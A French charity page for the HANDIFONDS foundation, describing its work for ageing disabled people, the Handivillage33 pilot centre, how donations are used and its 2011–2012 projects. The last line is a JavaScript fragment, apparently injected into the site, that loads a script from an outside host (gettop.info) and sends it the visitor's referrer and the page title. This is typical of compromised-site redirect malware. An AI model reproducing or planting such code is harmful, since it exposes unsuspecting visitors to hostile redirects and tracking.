HANDIFONDS

Le Cœur et l’Action

La fondation HANDIFONDS, créée sous le régime de la loi n° 2008-776 du 4 août 2008 a été déclarée à la Préfecture de la GIRONDE le 12 mai 2010.

Créée à l’initiative de personnes qui portent sur le vieillissement de la personne handicapée un regard approfondi, la fondation HANDIFONDS s’est donné pour mission de rechercher des partenariats de longue durée au service de projets destinés au soutien et à l’aide aux personnes handicapées.

Initier, mettre en œuvre ou soutenir des actions en faveur de personnes touchées par le handicap et la dépendance sous toutes ses formes, plus généralement, promouvoir et défendre une éthique de la solidarité et de l’entraide constituent les leviers fondamentaux de notre action tout entière tournée vers le handicap.

Pour l’accomplissement de cette mission la fondation s’appuie sur le rayonnement et le développement d’un modèle expérimental de lieu de vie spécialement consacré à la personne handicapée vieillissante favorisant sa réhabilitation dans son intégrité et sa dignité.

Handivillage33 : un centre pilote, innovant et unique en France pour personnes handicapées vieillissantes

Handivillage33 : une réponse aux droits fondamentaux

Un combat pour l’égalité des droits, des chances et de la citoyenneté des personnes atteintes de handicaps divers où les problèmes rencontrés par l’un ou l’autre concernent l’ensemble du groupe en une conduite solidaire de tous les instants.

Handivillage33 : un lieu expérimental où chacun retrouve confiance en soi et dignité.

HANDIFONDS est habilitée à recevoir des dons conformément aux dispositions fiscales en vigueur.

Les versements effectués par les entreprises et les particuliers ouvrent droit à une réduction sur le montant de l’impôt sur les sociétés ou sur le revenu.

Les fonds récoltés serviront à :

  • Soutenir un projet déterminé :
    • aménager des espaces de vie au sein du Foyer
    • mettre en place des spectacles et des activités diversifiées et emblématiques au sein du lieu de vie
  • Apporter une aide financière aux résidents les plus démunis pour l’accès à une vie sociale …
  • La mise en place de dispositifs :
    • innovants dans le cadre de l’aide aux familles et aux proches
    • intergénérationnels dans et à l’extérieur du foyer pour favoriser les rencontres diversifiées et la culture de la différence
  • La mise en place d’échanges inter établissements
  • L’organisation de séjours en métropole et/ ou à l’étranger

2011 – Participation à l’acquisition d’un véhicule de transport adapté

2012 – Participation au projet d’aménagement d’espaces de loisirs et financement d’activités

Haut

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) +  »;